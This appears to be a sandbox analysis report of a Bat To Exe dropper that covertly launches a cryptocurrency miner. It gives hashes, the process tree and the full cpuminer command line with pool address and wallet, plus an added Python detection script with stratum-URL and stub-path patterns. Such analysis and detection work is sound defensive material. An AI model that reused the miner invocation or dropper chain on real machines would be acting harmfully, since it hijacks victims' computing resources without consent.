Analysis
max time kernel: 296s
max time network: 300s
platform: windows10-2004_x64
resource: win10v2004-20231215-ja
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-ja, locale:ja-jp, os:windows10-2004-x64, system:windows
submitted: 11/02/2024, 15:45
Behavioral task behavioral1: sample batexe.exe, resource win10-20231215-ja
Behavioral task behavioral2: sample batexe.exe, resource win10v2004-20231215-ja
General
Target: batexe.exe
Size: 9.4MB
MD5: cdc9eacffc6d2bf43153815043064427
SHA1: d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256: 73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512: fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP: 196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence. The same value is read during ordinary locale initialisation, so on its own this is weak evidence; it is worth noting here because both the dropper and the stub query it before the payload runs.
  Key value queried: \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation  (process batexe.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation  (process b2e.exe)
Executes dropped EXE (2 IoCs)
  PID 4740  b2e.exe
  PID 3628  cpuminer-sse2.exe
Loads dropped DLL (5 IoCs, all by PID 3628 cpuminer-sse2.exe)
YARA match (1 IoC)
  resource behavioral2/memory/1976-7-0x0000000000400000-0x000000000393A000-memory.dmp  yara_rule upx  (memory dump of PID 1976, batexe.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Suspicious use of WriteProcessMemory (8 IoCs)
Every write goes from a parent into the child it has just created, following the process tree below; that is what process creation looks like in this sandbox, not injection into an unrelated process.
  PID 1976 (batexe.exe) wrote to memory of PID 4740, procid_target 85  (3 IoCs)
  PID 4740 (b2e.exe) wrote to memory of PID 4924, procid_target 86  (3 IoCs)
  PID 4924 (cmd.exe) wrote to memory of PID 3628, procid_target 89  (2 IoCs)
Processes
C:\Users\Admin\AppData\Local\Temp\batexe.exe  (PID 1976, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe  (PID 4740, depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe  (PID 4924, depth 3)
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71C5.tmp\batchfile.bat" "
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe  (PID 3628, depth 4)
        Command line: cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
        - Executes dropped EXE
        - Loads dropped DLL

The chain is the whole story. The b2e.exe stub in a %TEMP%\<hex>.tmp directory and its argument pattern are those of a Bat To Exe Converter build: batexe.exe unpacks the stub into %TEMP%\69F5.tmp, the stub hands the embedded batch file (extracted to %TEMP%\71C5.tmp) to the 32-bit cmd.exe under SysWOW64, and the batch file launches cpuminer-sse2.exe against zpool's yespower stratum endpoint on port 6234 with three threads. The wallet address is passed as the stratum username and c=doge as the password, zpool's convention for selecting the payout coin. The pool host, port and wallet are the indicators worth extracting; the file hashes below will change with every rebuild of the batch file.
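Detection logic for the chain recorded in the Signatures and Processes sections, written as an added example for this page; it is not part of the sandbox report and is not code from cpuminer, Bat To Exe Converter or any other tool named here. It assumes process-creation events with pid, ppid, image and cmdline fields, as Sysmon emits; the event list is constructed by hand from the process tree above, and the parent of batexe.exe, which the report does not give, is left as None.

```python
"""
Added example (not part of the sandbox report or of any tool it names): flag a
cpuminer launched with a stratum pool URL, recover its pool and credentials,
walk its ancestry, and separately flag the bat-to-exe stub pattern (b2e.exe in
a <hex>.tmp directory under %TEMP% whose cmd.exe child runs a .bat out of a
second <hex>.tmp directory). Event fields are assumed Sysmon-like.
"""
import re

EVENTS = [  # constructed by hand from the report's process tree, not telemetry
    {"pid": 1976, "ppid": None,  # parent not given in the report
     "image": r"C:\Users\Admin\AppData\Local\Temp\batexe.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\batexe.exe"'},
    {"pid": 4740, "ppid": 1976,
     "image": r"C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe" '
                r'C:\Users\Admin\AppData\Local\Temp\69F5.tmp\b2e.exe '
                r'C:\Users\Admin\AppData\Local\Temp '
                r'"C:\Users\Admin\AppData\Local\Temp\batexe.exe"'},
    {"pid": 4924, "ppid": 4740,
     "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\71C5.tmp\batchfile.bat" "'},
    {"pid": 3628, "ppid": 4924,
     "image": r"C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe",
     "cmdline": "cpuminer-sse2.exe -a yespower "
                "-o stratum+tcp://yespower.sea.mine.zpool.ca:6234 "
                "--userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3"},
]

# Bat To Exe Converter drops its stub as %TEMP%\<hex>.tmp\b2e.exe and runs the
# embedded batch file, extracted to another <hex>.tmp directory, via cmd.exe /c.
B2E_STUB = re.compile(r"\\Temp\\[0-9A-F]{1,4}\.tmp\\b2e\.exe$", re.I)
BAT_IN_TMP = re.compile(r'\\Temp\\[0-9A-F]{1,4}\.tmp\\[^\\"]+\.bat\b', re.I)
# Stratum pool URL as cpuminer/xmrig-style miners pass it to -o / --url.
STRATUM_URL = re.compile(
    r"stratum\+(?:tcp|ssl|tls)://(?P<host>[^\s:/\"']+)(?::(?P<port>\d+))?", re.I)


def parse_miner_cmdline(cmdline):
    """Return pool, credentials, algorithm and thread count from a cpuminer-style
    command line, or None when it names no stratum pool."""
    m = STRATUM_URL.search(cmdline)
    if not m:
        return None
    info = {"pool_host": m["host"],
            "pool_port": int(m["port"]) if m["port"] else None,
            "algo": None, "user": None, "password": None, "threads": None}
    toks = []  # normalise --opt=value into two tokens so one loop handles both forms
    for t in cmdline.split():
        toks.extend(t.split("=", 1) if t.startswith("--") and "=" in t else [t])
    i = 0
    while i < len(toks):
        tok = toks[i]
        val = toks[i + 1] if i + 1 < len(toks) else None
        if tok in ("-a", "--algo"):
            info["algo"] = val
        elif tok in ("-t", "--threads") and val and val.isdigit():
            info["threads"] = int(val)
        elif tok in ("-O", "--userpass") and val:
            # wallet goes in the user field; zpool reads c=<coin> from the password
            info["user"], _, info["password"] = val.partition(":")
        elif tok in ("-u", "--user"):
            info["user"] = val
        elif tok in ("-p", "--pass"):
            info["password"] = val
        else:
            i += 1
            continue
        i += 2
    return info


def ancestry(event, by_pid):
    """Image basenames from the event up through its parents, cycle-safe."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur["image"].rsplit("\\", 1)[-1])
        cur = by_pid.get(cur["ppid"])
    return chain


def detect(events):
    """Return findings for stratum miners (with ancestry) and for b2e.exe stubs
    whose cmd.exe child runs a .bat from a <hex>.tmp directory."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        miner = parse_miner_cmdline(e["cmdline"])
        if miner:
            findings.append({"rule": "stratum_miner", "pid": e["pid"],
                             "chain": ancestry(e, by_pid), **miner})
        if B2E_STUB.search(e["image"]):
            for c in events:
                if (c["ppid"] == e["pid"]
                        and c["image"].lower().endswith("\\cmd.exe")
                        and BAT_IN_TMP.search(c["cmdline"])):
                    findings.append({"rule": "bat2exe_stub", "pid": e["pid"],
                                     "cmd_pid": c["pid"],
                                     "batch_cmdline": c["cmdline"]})
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Run against the constructed events it yields two findings: the miner with its ancestry back to batexe.exe (pool host, port, algorithm, wallet and payout-coin password parsed out), and the stub with the cmd.exe command line that launched the batch file. The stratum URL is the strong signal; the b2e.exe-in-.tmp pattern also fires on legitimately converted batch files, so it is better used to enrich a miner hit than to alert on its own.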
Network
MITRE ATT&CK Enterprise v15
Downloads (dropped files; the report lists sizes and hashes only, no file names)

File 1, size 36.6MB
  MD5    b443bef570bf7df923527c08e94cd7b8
  SHA1   0eae66ce8848fcd78d9ddf7145ace9f410557549
  SHA256 6db741492d6768c352a594380b0aca933eba4e731598c86d5f06698a9553829c
  SHA512 bf614292d9a48cd10c5a502278923e03527da8eb28b473b172f6004f9eb0eedf1292b8186c28a4ee1dbd7ea8020c95ae4d93ac19ede4d7a81366c2278595971f

File 2, size 3.1MB
  MD5    96120993939f45494a2291ac005fc474
  SHA1   a3cbe6f79529aebfeeb7adf91dd6b9af72029334
  SHA256 238062b41bcb8369b3812623b0835fea1db60ed979c076477c0f9e4f50fbc838
  SHA512 04e8b936a4401d1f0fa77d89c125aac6d30e3d56142eb91ff8f4e89f12e5c5b27b619ba4c67996833ecb4571fdd4bef315279951a67b823f64c67ec71f121615

File 3, size 1.9MB
  MD5    033a32e0272358cd590b05071af214b2
  SHA1   827a640a38909f747f59e8f2424e850d85dd7989
  SHA256 72ffab0933d1a19c411d302fe2064aa305c7d1776dd3b7d9f43e4faa7e9f70e0
  SHA512 0b93ced0cadeaa2c89ed8af42de8599765005886e2b9c073403fb845920cf63df24ed8def10afe301724a7bf4c52f7870ffe9c6f519ea37d9ded66cabb803261

File 4, size 136B
  MD5    8ea7ac72a10251ecfb42ef4a88bd330a
  SHA1   c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
  SHA256 65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
  SHA512 a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

File 5, size 748KB
  MD5    2d686420f467f783910e92c34b9a07e0
  SHA1   d5d153ecc02a1b94a7509988560599532a584228
  SHA256 260b982ed31a618d2e974f14683966f3934de593cba6656035ef112d19d2b4a0
  SHA512 d0779525db068a04bdadd437b5e7c7d06b75407d400d726ce3c60d35777f1cdacc09b5c06a4cec6cf019d29c5f7dd5ce3e667a4c2fe96d7724b8f843a344ea3f

File 6, size 977KB
  MD5    60a5b75339dd505cf5cdad5b6aea2eb1
  SHA1   3437991acf9b77b6babcc8f9880bc79b70c5dfa4
  SHA256 a21bd5ab21620906c6b311bf83d93e469eed67d716081e83e17338c140ba12e7
  SHA512 07b071022fff900efd25697c83374b7cd2b6c32092c058a31489b78849382dc7d9126c3279cc73e40d0f77c20554f7671c511c871e3bed96a25b4c2b0855ead8

File 7, size 768KB
  MD5    e3f15c79f945604229fa814f57c79274
  SHA1   19a7015dfbe622ab86c48693ee1605b26112a3fa
  SHA256 7b09ee53447ccf77a0f2d7bfe25908f963d681433d3cba5a16c7f45646c42175
  SHA512 12dc1df8a947caee13a12eca5a976feffd7408402b0495e4971d4bd7181e8d353ebc17da044d2ce6d1c273bb05a0ca5ddf7492394b355786d8b14b0997de162c

File 8, size 789KB
  MD5    e683ab372c055c9c8604997d7ffd5db7
  SHA1   1d47c72c06e2500128abe219ab2e5dc55ffdee11
  SHA256 0f328cb1a0d6cae81812b0e5409f9b41e3635323c347603f50d8fdad36fbb832
  SHA512 14200de0e900cb3ba85e85a1fe5ebc7b0f593ae76054ac3569af041d71ef098af977fca97f409fd58f1b08a5860132b646608c5554c20b588238072ef199e86a

File 9, size 655KB
  MD5    ae59af5241316a448dbcf72355856127
  SHA1   eb8801d3430e27ed0e6e0cff4ea8d89c76643bbd
  SHA256 ae3552af06636898c7f639b42e55838415ebb9ddd9e4a966c74b701617bac9fc
  SHA512 d9a9c21c2b231c5817b9c7caff98cd7d662de65ab03a8587f21756a17a6cb47bf9f9dca310ca2999fc893b55192d850065bb7535c7545e89a94295693291dfa1

File 10, size 478KB
  MD5    b5efe39b44c145e81939dfcfc87c9a7d
  SHA1   4f637321ff23c601fc0c48ab4d2a12e37355b1fe
  SHA256 c2956b2888ab2d3a29aac6a5d6be2d869befd78522ea401dbc328d022ca4e427
  SHA512 873db49ff4e8deb93d79bfd48d3c141d3ed82d6953a802c0c2d77d135d562b748f12745075a2f9fcb74d32f3d3aaa5e632ffe206e961c03b9c8ec9738c3c5d6b

File 11, size 768KB
  MD5    613807ad6d525aded318b643c33bc17e
  SHA1   2c9a4180140838c69c20bc4047c3d2d777d3bee4
  SHA256 896775bd33edafb0d219d1ae3e973e71aa29a4937d0252bd3a4cad074c004971
  SHA512 d688b0f2570944898097dcc6acb56b3a4c901073f0ce22b5ea260b05a37fe2840d84b44e7aa74c7d73078b0e5a45c24994852f5c03f049982b6ddca6ead89539

File 12, size 524KB
  MD5    a66b1fb36accd4d995088bf060cacc15
  SHA1   18681314d2212000bc75e5fedef7c254eae3eede
  SHA256 688f40db0b2b4c6abc80e21dc1b4111a300927c9130a7d09946d325d1306a99f
  SHA512 c0d6fd55e4383feb1f0b4ed5f04e98604c7d656807efa9aac757c45da0c48475ad905ed87fb8f1afe2be7ee46d6c5448a41bde2b9bcf2bb13f5002780d71659d

File 13, size 667KB
  MD5    0f4c1aa30b782ec126533649f95194df
  SHA1   5fef5d00e5f227edf7d123b8d474cede667ce453
  SHA256 36ce422310b95f9a7429676b3931238e968841a4bb755566f134ddfd3386a037
  SHA512 e55da8e485d46c08fc5967603b0b6d6c1c041c15f1d32c6cf681b6b5fa36be67300fdf69810722eaafeb8d0d108f8da94d98651437d5edcece9624b8e62c4ccd

File 14, size 606KB
  MD5    585efec1bc1d4d916a4402c9875dff75
  SHA1   d209613666ccac9d0ddab29a3bc59aa00a0968fa
  SHA256 2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
  SHA512 b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770